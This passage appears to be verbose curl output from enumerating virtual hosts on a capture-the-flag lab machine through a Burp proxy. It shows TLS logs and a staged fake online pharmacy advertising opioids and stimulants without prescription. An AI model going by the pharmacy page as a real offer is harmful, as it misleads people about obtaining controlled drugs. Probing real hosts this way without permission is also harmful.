  1416. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1417. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1418. *   Trying 127.0.0.1...
  1419. * TCP_NODELAY set
  1420. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1421. * allocate connect buffer!
  1422. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1423. > CONNECT 10.10.10.144:443 HTTP/1.1
  1424. > Host: 10.10.10.144:443
  1425. > User-Agent: curl/7.61.0
  1426. > Proxy-Connection: Keep-Alive
  1427. >
  1428. < HTTP/1.0 200 Connection established
  1429. <
  1430. * Proxy replied 200 to CONNECT request
  1431. * CONNECT phase completed!
  1432. * ALPN, offering h2
  1433. * ALPN, offering http/1.1
  1434. * successfully set certificate verify locations:
  1435. *   CAfile: none
  1436.   CApath: /etc/ssl/certs
  1437. * (304) (OUT), TLS handshake, Client hello (1):
  1438. * CONNECT phase completed!
  1439. * CONNECT phase completed!
  1440. * (304) (IN), TLS handshake, Server hello (2):
  1441. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1442. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1443. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1444. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1445. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1446. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1447. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1448. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1449. * ALPN, server did not agree to a protocol
  1450. * Server certificate:
  1451. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1452. *  start date: Jan 21 17:26:12 2014 GMT
  1453. *  expire date: Jan 21 17:26:12 2038 GMT
  1454. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1455. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1456. > GET / HTTP/1.1
  1457. > Host: vaccine4flu.htb
  1458. > User-Agent: curl/7.61.0
  1459. > Accept: */*
  1460. >
  1461. < HTTP/1.1 200 OK
  1462. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1463. < Content-Type: text/html; charset=UTF-8
  1464. < Connection: close
  1465. < Server: ClownWare Proxy
  1466. < Content-Length: 502
  1467. <
  1468. <!DOCTYPE html>
  1469. <html>
  1470.     <head>
  1471.         <style type="text/css">
  1472.             body {
  1473.                 background-color: #000;
  1474.             }
  1475.             img {
  1476.             width: 100%;
  1477.             height: auto;
  1478.         }
  1479.         </style>
  1480.     </head>
  1481.     <body>
  1482.         <center>
  1483.             <img src="/getvacc.gif"/>
  1484.             <img src="/getvacc.gif"/>
  1485.             <img src="/getvacc.gif"/>
  1486.             <img src="/getvacc.gif"/>
  1487.             <img src="/getvacc.gif"/>
  1488.         </center>
  1489.     </body>
  1490. * Closing connection 0
  1491. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1492. </html>
  1493.  
  1494. bestmedsupply.htb
  1495. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1496. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1497. *   Trying 127.0.0.1...
  1498. * TCP_NODELAY set
  1499. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1500. * allocate connect buffer!
  1501. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1502. > CONNECT 10.10.10.144:443 HTTP/1.1
  1503. > Host: 10.10.10.144:443
  1504. > User-Agent: curl/7.61.0
  1505. > Proxy-Connection: Keep-Alive
  1506. >
  1507. < HTTP/1.0 200 Connection established
  1508. <
  1509. * Proxy replied 200 to CONNECT request
  1510. * CONNECT phase completed!
  1511. * ALPN, offering h2
  1512. * ALPN, offering http/1.1
  1513. * successfully set certificate verify locations:
  1514. *   CAfile: none
  1515.   CApath: /etc/ssl/certs
  1516. * (304) (OUT), TLS handshake, Client hello (1):
  1517. * CONNECT phase completed!
  1518. * CONNECT phase completed!
  1519. * (304) (IN), TLS handshake, Server hello (2):
  1520. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1521. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1522. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1523. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1524. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1525. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1526. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1527. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1528. * ALPN, server did not agree to a protocol
  1529. * Server certificate:
  1530. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1531. *  start date: Jan 21 17:26:12 2014 GMT
  1532. *  expire date: Jan 21 17:26:12 2038 GMT
  1533. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1534. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1535. > GET / HTTP/1.1
  1536. > Host: bestmedsupply.htb
  1537. > User-Agent: curl/7.61.0
  1538. > Accept: */*
  1539. >
  1540. < HTTP/1.1 200 OK
  1541. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1542. < Content-Type: text/html; charset=UTF-8
  1543. < Connection: close
  1544. < Server: ClownWare Proxy
  1545. < Content-Length: 21065
  1546. <
  1547. <!DOCTYPE html>
  1548. <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" class=" mod-js mod-svg mod-boxsizing mod-mediaqueries" lang="en-US"><head>
  1549. <title>BUY ONLINE DRUG|MY HEALTH ONLINE CARE</title>
  1550. <meta name="viewport" content="width=device-width">
  1551. <link rel="canonical" href="https://bestmedsupply.htb/mens-health.html">
  1552. <link rel="shortcut icon" href="https://bestmedsupply.htb/favicon.ico" type="image/x-icon">
  1553. <link href="index_files/css.css" rel="stylesheet" type="text/css">
  1554. <link rel="stylesheet" type="text/css" href="index_files/normalize.css" media="screen">
  1555. <link rel="stylesheet" type="text/css" href="index_files/grid.css" media="screen">
  1556. <link rel="stylesheet" type="text/css" href="index_files/common.css" media="screen">
  1557. <link rel="stylesheet" type="text/css" href="index_files/black.css" media="screen">
  1558. <link rel="stylesheet" type="text/css" href="index_files/superfish.css" media="screen">
  1559. <link rel="stylesheet" type="text/css" href="index_files/superfish-vertical.css" media="screen">
  1560. <link rel="stylesheet" type="text/css" href="index_files/superfish-mobile.css" media="screen and (max-width:650px)">
  1561. <link rel="stylesheet" type="text/css" href="index_files/style.css">
  1562. <!--[if IE 7]>
  1563. <link rel="stylesheet" type="text/css" href="https://bestmedsupply.htb/skins/e-tone/icomoon/ie7/ie7.css" />
  1564. <![endif]-->
  1565. <link rel="stylesheet" type="text/css" href="index_files/styles.css" media="screen">
  1566.  
  1567. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  1568. <meta name="description" content="Online Pharmacy without prescription medicine. Modest Online Pharmacy. Online Drugstore no RX. Spare your Time and Money! Purchase Generic Buy Generic cialis 20 mg online…">
  1569. <meta name="keywords" content="Buy Adderall 30mg online,Buy Levitra Vardenafil 10 mg online,Buy Viagra Sildenafil Citrate 200mg,Buy Cialis Tadalifil Citrate 40mg Online,Buy Ritalin Methylphenidate 10mg Online,Buy cheap tramadol 100mg online">
  1570. <meta name="robots" content="index, follow">
  1571. <meta name="generator" content="cubecart">
  1572.  
  1573. <script src="index_files/enquire.js"></script><script src="index_files/superfish.js"></script><script src="index_files/script.js"></script><script type="text/javascript" async="" src="index_files/ga.js"></script><script type="text/javascript">
  1574. var _gaq = _gaq || [];
  1575. _gaq.push(['_setAccount', 'UA-112093729-1 ']);
  1576. _gaq.push(['_trackPageview'])
  1577. (function() {
  1578.     var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  1579.     ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  1580.     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  1581. })();
  1582. </script>
  1583.  
  1584. </head>
  1585.  
  1586. <body class="category">
  1587.  
  1588. <div id="header">
  1589.     <div class="container">
  1590.         <div id="utility" class="not-wide not-normal">
  1591.         </div>
  1592.     </div>
  1593. </div>
  1594.  
  1595. <div class="container" id="container">
  1596.     <div class="row" id="logo">
  1597.         <div class="u12"><a href="https://bestmedsupply.htb/"><img src="index_files/xrhealthy112.png" alt="Mens Health - online pharmacy"></a></div>
  1598.     </div>
  1599.     <div class="row" id="documents">
  1600.         <div class="u12">
  1601.             <ul class="documents">
  1602.             <li>
  1603.         <a href="https://bestmedsupply.htb/about-us.html" title="About Us">
  1604.             About Us
  1605.         </a>
  1606.     </li>
  1607.         <li>
  1608.         <a href="https://bestmedsupply.htb/terms-and-conditions.html" title="Terms and Conditions">
  1609.             Terms and Conditions
  1610.         </a>
  1611.     </li>
  1612.         <li>
  1613.         <a href="https://bestmedsupply.htb/privacy-policy.html" title="Privacy Policy">
  1614.             Privacy Policy
  1615.         </a>
  1616.     </li>
  1617.    
  1618.         </ul>
  1619.         </div>
  1620.     </div>
  1621.    
  1622.        
  1623.     <div id="page">
  1624.     <div class="row">
  1625.         <div class="u3 sidebar" id="sidebar-left">
  1626.             <div class="box">
  1627.             <div id="navigation">
  1628.     <h3 id="navigation-toggle"><span>Shop by Category</span></h3>
  1629.     <ul class="sf-menu sf-vertical sf-mobile sf-js-enabled sf-arrows">
  1630.         <li>
  1631.   <a href="https://bestmedsupply.htb/adhd.html" title="ADHD">ADHD</a>
  1632.   </li><li>
  1633.   <a href="https://bestmedsupply.htb/mens-health.html" title="Mens Health">Mens Health</a>
  1634.   </li><li>
  1635.   <a href="https://bestmedsupply.htb/anti-anxiety.html" title="Anti Anxiety">Anti Anxiety</a>
  1636.   </li><li>
  1637.   <a href="https://bestmedsupply.htb/pain-killers.html" title="Pain Killers">Pain Killers</a>
  1638.   </li>
  1639.                     </ul>
  1640. </div>
  1641.             <div id="quick_search">
  1642.     <!--<h3>Search</h3>-->
  1643.     <form action="/index.php?_a=category" method="get">
  1644.         <input type="hidden" name="_a" value="category" original="category">
  1645.         <p class="btn-pair input">
  1646.             <input name="search[keywords]" type="text" id="keywords" class="left" title="Search our store" size="18" original="Search our store" value="Search our store">
  1647.             <button type="submit" class="right" original=""><span class="icon icon-search"></span><!--Search--></button>
  1648.         </p>
  1649.         <a href="https://bestmedsupply.htb/search.html">Advanced Search</a>
  1650.     </form>
  1651. </div>
  1652.             </div>
  1653.                         <div class="box not-narrow not-mobile"><div id="popular_products">
  1654.     <h3><span class="icon icon-star3"></span> Best Sellers</h3>
  1655.     <ol>
  1656.                 <li><a href="https://bestmedsupply.htb/buy-tramadol-100mg-online-no-prescription.html" title="Buy Tramadol 100mg online no prescription ">Buy Tramadol 100mg online no prescription </a></li>
  1657.                 <li><a href="https://bestmedsupply.htb/pain-killers/buy-adderall-30mg-online.html" title="Buy Soma 350mg Online">Buy Soma 350mg Online</a></li>
  1658.                 <li><a href="https://bestmedsupply.htb/pain-killers/buy-adderall-30mg-online-p23.html" title="Buy Adderall 30mg online">Buy Adderall 30mg online</a></li>
  1659.                 <li><a href="https://bestmedsupply.htb/anti-anxiety/buy-xanax-online-1mg.html" title="Buy Soma 500mg online">Buy Soma 500mg online</a></li>
  1660.                 <li><a href="https://bestmedsupply.htb/pain-killers/buy-oxycodone-40mg-online-p9.html" title="Buy Oxycodone 40mg Online">Buy Oxycodone 40mg Online</a></li>
  1661.                 <li><a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">Buy Ritalin (Methylphenidate) 10mg Online</a></li>
  1662.        
  1663.     </ol>
  1664. </div></div>        </div>
  1665.        
  1666.         <div class="u6" id="content">
  1667.             <ul id="breadcrumb">
  1668.                 <li class="first"><a href="https://bestmedsupply.htb/">Home</a></li>
  1669.                                 <li><a href="https://bestmedsupply.htb/mens-health.html">Mens Health</a></li>
  1670.                
  1671.             </ul>
  1672.            
  1673.                         <h1>Mens Health</h1>
  1674.  
  1675.  
  1676.  
  1677.  
  1678. <form action="https://bestmedsupply.htb/mens-health.html" method="post" class="control">
  1679.     <span class="pagination"></span>
  1680.         <span class="sort">
  1681.     Sort by
  1682.     <select name="sort" class="auto_submit" original="name|ASC">
  1683.         <option value="">-- Please Select --</option>
  1684.                 <option value="name|DESC">Name (Z-A)</option>
  1685.                 <option value="name|ASC" selected="selected">Name (A-Z)</option>
  1686.                 <option value="date_added|DESC">Date Added (Newest First)</option>
  1687.                 <option value="date_added|ASC">Date Added (Oldest First)</option>
  1688.                 <option value="price|DESC">Price (High-Low)</option>
  1689.                 <option value="price|ASC">Price (Low-High)</option>
  1690.        
  1691.     </select>
  1692.     <input type="submit" value="Sort" original="Sort" style="display: none;">
  1693.     </span>
  1694.     </form>
  1695.  
  1696. <div class="product-list">
  1697.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P20">
  1698.         <p class="image">
  1699.             <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-40mg-online.html" title="Buy Cialis (Tadalifil Citrate) 40mg Online">
  1700.                 <img src="index_files/Buy_Cialis__Tadalifil_Citrate__40mg_Online.jpg" alt="Buy Cialis (Tadalifil Citrate) 40mg Online">
  1701.             </a>
  1702.                     </p>
  1703.         <div class="info">
  1704.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-40mg-online.html" title="Buy Cialis (Tadalifil Citrate) 40mg Online">Buy Cialis (Tadalifil Citrate)</a></p>
  1705.            
  1706.                         <p class="price">$1.25</p>
  1707.                        
  1708.             <p class="actions">
  1709.                 <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-40mg-online.html" title="Buy Cialis (Tadalifil Citrate) 40mg Online">Info</a>
  1710.                                 <input type="hidden" name="add[20][quantity]" value="1" class="quantity" original="1">
  1711.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P20')" original="Buy">
  1712.                             </p>
  1713.         </div>
  1714.     </form>
  1715.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P19">
  1716.         <p class="image">
  1717.             <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">
  1718.                 <img src="index_files/Buy_Cialis__Tadalifil_Citrate__40mg_Online.jpg" alt="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">
  1719.             </a>
  1720.                     </p>
  1721.         <div class="info">
  1722.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">Buy Generic cialis 20 mg online…</a></p>
  1723.            
  1724.                         <p class="price">$0.90</p>
  1725.                        
  1726.             <p class="actions">
  1727.                 <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">Info</a>
  1728.                                 <input type="hidden" name="add[19][quantity]" value="1" class="quantity" original="1">
  1729.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P19')" original="Buy">
  1730.                             </p>
  1731.         </div>
  1732.     </form>
  1733.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P22">
  1734.         <p class="image">
  1735.             <a href="https://bestmedsupply.htb/mens-health/buy-levitra-vardenafil-10-mg-online.html" title="Buy Levitra (Vardenafil) 10 mg online">
  1736.                 <img src="index_files/Buy_Levitra__Vardenafil__10_mg_online.jpg" alt="Buy Levitra (Vardenafil) 10 mg online">
  1737.             </a>
  1738.                     </p>
  1739.         <div class="info">
  1740.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-levitra-vardenafil-10-mg-online.html" title="Buy Levitra (Vardenafil) 10 mg online">Buy Levitra (Vardenafil) 10 mg online</a></p>
  1741.            
  1742.                         <p class="price">$1.10</p>
  1743.                        
  1744.             <p class="actions">
  1745.                 <a href="https://bestmedsupply.htb/mens-health/buy-levitra-vardenafil-10-mg-online.html" title="Buy Levitra (Vardenafil) 10 mg online">Info</a>
  1746.                                 <input type="hidden" name="add[22][quantity]" value="1" class="quantity" original="1">
  1747.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P22')" original="Buy">
  1748.                             </p>
  1749.         </div>
  1750.     </form>
  1751.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P17">
  1752.         <p class="image">
  1753.             <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">
  1754.                 <img src="index_files/Ritalin__Methylphenidate__10mg.jpg" alt="Buy Ritalin (Methylphenidate) 10mg Online">
  1755.             </a>
  1756.                     </p>
  1757.         <div class="info">
  1758.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">Buy Ritalin (Methylphenidate)</a></p>
  1759.            
  1760.                         <p class="price">$0.95</p>
  1761.                        
  1762.             <p class="actions">
  1763.                 <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">Info</a>
  1764.                                 <input type="hidden" name="add[17][quantity]" value="1" class="quantity" original="1">
  1765.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P17')" original="Buy">
  1766.                             </p>
  1767.         </div>
  1768.     </form>
  1769.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P18">
  1770.         <p class="image">
  1771.             <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-100mg-online.html" title="Buy Viagra (Sildenafil Citrate) 100mg Online">
  1772.                 <img src="index_files/Buy_Viagra__Sildenafil_Citrate__100mg_Online.jpg" alt="Buy Viagra (Sildenafil Citrate) 100mg Online">
  1773.             </a>
  1774.                     </p>
  1775.         <div class="info">
  1776.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-100mg-online.html" title="Buy Viagra (Sildenafil Citrate) 100mg Online">Buy Viagra (Sildenafil Citrate)</a></p>
  1777.            
  1778.                         <p class="price">$0.75</p>
  1779.                        
  1780.             <p class="actions">
  1781.                 <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-100mg-online.html" title="Buy Viagra (Sildenafil Citrate) 100mg Online">Info</a>
  1782.                                 <input type="hidden" name="add[18][quantity]" value="1" class="quantity" original="1">
  1783.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P18')" original="Buy">
  1784.                             </p>
  1785.         </div>
  1786.     </form>
  1787.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P21">
  1788.         <p class="image">
  1789.             <a href="https://bestmedsupply.htb/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Viagra (Sildenafil Citrate) 200mg">
  1790.                 <img src="index_files/Buy_Viagra__Sildenafil_Citrate__200mg.jpg" alt="Buy Viagra (Sildenafil Citrate) 200mg">
  1791.             </a>
  1792.                     </p>
  1793.         <div class="info">
  1794.             <p class="title"><a href="https://bestmedsupply.htb/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Viagra (Sildenafil Citrate) 200mg">Buy Viagra (Sildenafil Citrate) 200mg</a></p>
  1795.            
  1796.                         <p class="price">$0.85</p>
  1797.                        
  1798.             <p class="actions">
  1799.                 <a href="https://bestmedsupply.htb/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Viagra (Sildenafil Citrate) 200mg">Info</a>
  1800.                                 <input type="hidden" name="add[21][quantity]" value="1" class="quantity" original="1">
  1801.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P21')" original="Buy">
  1802.                             </p>
  1803.         </div>
  1804.     </form>
  1805.    
  1806. </div>
  1807.  
  1808. <form action="https://bestmedsupply.htb/mens-health.html" method="post" class="control">
  1809.     <span class="pagination"></span>
  1810.         <span class="sort">
  1811.     Sort by
  1812.     <select name="sort" class="auto_submit" original="name|ASC">
  1813.       <option value="">-- Please Select --</option>
  1814.           <option value="name|DESC">Name (Z-A)</option>
  1815.           <option value="name|ASC" selected="selected">Name (A-Z)</option>
  1816.           <option value="date_added|DESC">Date Added (Newest First)</option>
  1817.           <option value="date_added|ASC">Date Added (Oldest First)</option>
  1818.           <option value="price|DESC">Price (High-Low)</option>
  1819.           <option value="price|ASC">Price (Low-High)</option>
  1820.      
  1821.     </select>
  1822.     <input type="submit" value="Sort" original="Sort" style="display: none;">
  1823.     </span>
  1824.     </form>
  1825.  
  1826.         </div>
  1827.        
  1828.         <div class="u3 sidebar not-narrow" id="sidebar-right">
  1829.             <div class="box not-mobile" id="sessionbox">
  1830.             <div id="session">
  1831.         <p id="session_false">
  1832.         <a href="https://bestmedsupply.htb/login.html" title="Log In" class="btn"><span class="icon icon-login"></span> Log In</a> or <a href="https://bestmedsupply.htb/register.html" title="Register" class="btn">Register</a>
  1833.     </p>
  1834.     </div>
  1835.             <br>
  1836.             <div id="basket_summary">
  1837.   <h3 class="not-narrow not-mobile"><span class="icon icon-basket"></span> Your Shopping Basket</h3>
  1838.     <p class="not-narrow not-mobile">Your basket is empty.</p>
  1839.     <p class="basket_total">
  1840.     <span class="not-narrow not-mobile">Total:</span>
  1841.     <span class="icon icon-basket not-wide not-normal"></span>
  1842.     <b>$0.00</b>
  1843.   </p>
  1844.   <p class="view_basket"><a href="https://bestmedsupply.htb/index.php?_a=basket" title="View Basket" class="btn">View Basket</a></p>
  1845. </div>
  1846.             </div>
  1847.             <div class="box not-narrow not-mobile" id="randombox"><div id="featured_product">
  1848.     <form action="https://bestmedsupply.htb/mens-health.html" method="post" class="top addForm" enctype="application/x-www-form-urlencoded">
  1849.         <h3>Featured Product</h3>
  1850.         <p class="image">
  1851.             <a href="https://bestmedsupply.htb/pain-killers/buy-oxycodone-40mg-online-p9.html" title="Buy Oxycodone 40mg Online"><img src="index_files/Buy_Oxycodone_40mg_Online.png" alt="Buy Oxycodone 40mg Online"></a>
  1852.         </p>
  1853.         <p class="title"><a href="https://bestmedsupply.htb/pain-killers/buy-oxycodone-40mg-online-p9.html" title="Buy Oxycodone 40mg Online">Buy Oxycodone 40mg Online</a></p>
  1854.                 <p class="price">$1.75</p>
  1855.                         <div class="button">
  1856.             <input type="hidden" name="add[9][quantity]" value="1" original="1">
  1857.             <input type="submit" class="button_add_basket" value="Buy now" original="Buy now">
  1858.         </div>
  1859.             </form>
  1860. </div></div>
  1861.             <div class="box not-mobile" id="maillistbox"><div id="mailing_list">
  1862.     <h3><span class="icon icon-envelope"></span> Mailing List</h3>
  1863.         <form action="https://bestmedsupply.htb/mens-health.html" method="post">
  1864.         <p>Enter your e-mail address to receive our newsletter</p>
  1865.         <p class="btn-pair input">
  1866.             <input name="subscribe" type="text" class="required left" size="18" maxlength="250" title="Email" original="Email" value="Email">
  1867.             <input type="submit" class="submit right" value="Subscribe" original="Subscribe">
  1868.         </p>
  1869.     </form>
  1870.     </div></div>        </div>
  1871.     </div>
  1872.     </div>
  1873.    
  1874.     <div id="footer">
  1875.         <div class="row">
  1876.             <div class="u12">
  1877.                
  1878.             </div>
  1879.         </div>
  1880.         <div class="row">
  1881.                         <div class="u2"><form id="language_select" action="https://bestmedsupply.htb/mens-health.html" method="post">
  1882.     <!--Change Language-->
  1883.     <select name="set_language" class="auto_submit" original="en-US">
  1884.                 <option value="en-GB">English (UK)</option>
  1885.                 <option value="en-US" selected="selected">English (US)</option>
  1886.        
  1887.     </select>
  1888.     <input type="submit" value="Submit" original="Submit" style="display: none;">
  1889. </form></div>
  1890.                                     <div class="u2"><form id="currency_select" action="https://bestmedsupply.htb/mens-health.html" method="post">
  1891.     <!--Change Currency-->
  1892.     <select name="set_currency" class="auto_submit" original="USD">
  1893.                 <option value="USD" selected="selected" title="United States dollar">$ USD </option>
  1894.                 <option value="JPY" title="Japanese yen">¥ JPY </option>
  1895.                 <option value="GBP" title="Pound Sterling">£ GBP </option>
  1896.                 <option value="CAD" title="Canadian Dollar">$ CAD </option>
  1897.                 <option value="EUR" title="Euro">€ EUR </option>
  1898.                 <option value="AUD" title="Australian Dollar">$ AUD </option>
  1899.        
  1900.     </select>
  1901.     <input type="submit" value="Submit" original="Submit" style="display: none;">
  1902. </form></div>
  1903.                                             </div>
  1904.     </div>
  1905. </div>
  1906.  
  1907.  
  1908.  
  1909. <!-- Load JavaScript last -->
  1910. <script type="text/javascript" src="index_files/jquery.js"></script>
  1911. <script type="text/javascript" src="index_files/jquery-ui.js"></script>
  1912. <script type="text/javascript" src="index_files/plugins.php"></script>
  1913. <script type="text/javascript" src="index_files/common.js"></script>
  1914.  
  1915.  
  1916.  
  1917. <script type="text/javascript" src="index_files/modernizr.js"></script>
  1918. <script>
  1919.  
  1920. Modernizr.load([
  1921.     {
  1922.         test: window.matchMedia,
  1923.         nope: "https://bestmedsupply.htb/skins/e-tone/js/media.match.min.js"
  1924.     },
  1925.    
  1926.     "https://bestmedsupply.htb/skins/e-tone/js/enquire.min.js",
  1927.     "https://bestmedsupply.htb/skins/e-tone/js/superfish.js",
  1928.     "https://bestmedsupply.htb/skins/e-tone/js/script.js"
  1929.    
  1930. ]);
  1931. </script>
  1932.  
  1933. <!--[if IE 7]>
  1934. <script type="text/javascript">
  1935. $('.row > *').each(function(){
  1936.     var fullW = $(this).outerWidth(),
  1937.     actualW = $(this).width(),
  1938.     wDiff = fullW - actualW,
  1939.     newW = actualW - wDiff;
  1940.     $(this).css('width',newW);
  1941. });
  1942. </script>
  1943. <script type="text/javascript" src="{$STORE_URL}/skins/{$SKIN_FOLDER}/icomoon/ie7/ie7.js"></script>
  1944. <![endif]-->
  1945.  
  1946.  
  1947.  
  1948.  
  1949. <div id="cboxOverlay" style="display: none;"></div><div id="colorbox" class="" role="dialog" tabindex="-1" style="display: none;"><div id="cboxWrapper"><div><div id="cboxTopLeft" style="float: left;"></div><div id="cboxTopCenter" style="float: left;"></div><div id="cboxTopRight" style="float: left;"></div></div><div style="clear: left;"><div id="cboxMiddleLeft" style="float: left;"></div><div id="cbox* Closing connection 0
  1950. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1951. Content" style="float: left;"><div id="cboxTitle" style="float: left;"></div><div id="cboxCurrent" style="float: left;"></div><button type="button" id="cboxPrevious" original=""></button><button type="button" id="cboxNext" original=""></button><button type="button" id="cboxSlideshow" original=""></button><div id="cboxLoadingOverlay" style="float: left;"></div><div id="cboxLoadingGraphic" style="float: left;"></div></div><div id="cboxMiddleRight" style="float: left;"></div></div><div style="clear: left;"><div id="cboxBottomLeft" style="float: left;"></div><div id="cboxBottomCenter" style="float: left;"></div><div id="cboxBottomRight" style="float: left;"></div></div></div><div style="position: absolute; width: 9999px; visibility: hidden; display: none; max-width: none;"></div></div></body></html>
  1952.  
  1953. custoomercare.megabank.htb
  1954. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1955. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1956. *   Trying 127.0.0.1...
  1957. * TCP_NODELAY set
  1958. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1959. * allocate connect buffer!
  1960. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1961. > CONNECT 10.10.10.144:443 HTTP/1.1
  1962. > Host: 10.10.10.144:443
  1963. > User-Agent: curl/7.61.0
  1964. > Proxy-Connection: Keep-Alive
  1965. >
  1966. < HTTP/1.0 200 Connection established
  1967. <
  1968. * Proxy replied 200 to CONNECT request
  1969. * CONNECT phase completed!
  1970. * ALPN, offering h2
  1971. * ALPN, offering http/1.1
  1972. * successfully set certificate verify locations:
  1973. *   CAfile: none
  1974.   CApath: /etc/ssl/certs
  1975. * (304) (OUT), TLS handshake, Client hello (1):
  1976. * CONNECT phase completed!
  1977. * CONNECT phase completed!
  1978. * (304) (IN), TLS handshake, Server hello (2):
  1979. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1980. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1981. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1982. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1983. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1984. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1985. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1986. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1987. * ALPN, server did not agree to a protocol
  1988. * Server certificate:
  1989. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1990. *  start date: Jan 21 17:26:12 2014 GMT
  1991. *  expire date: Jan 21 17:26:12 2038 GMT
  1992. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
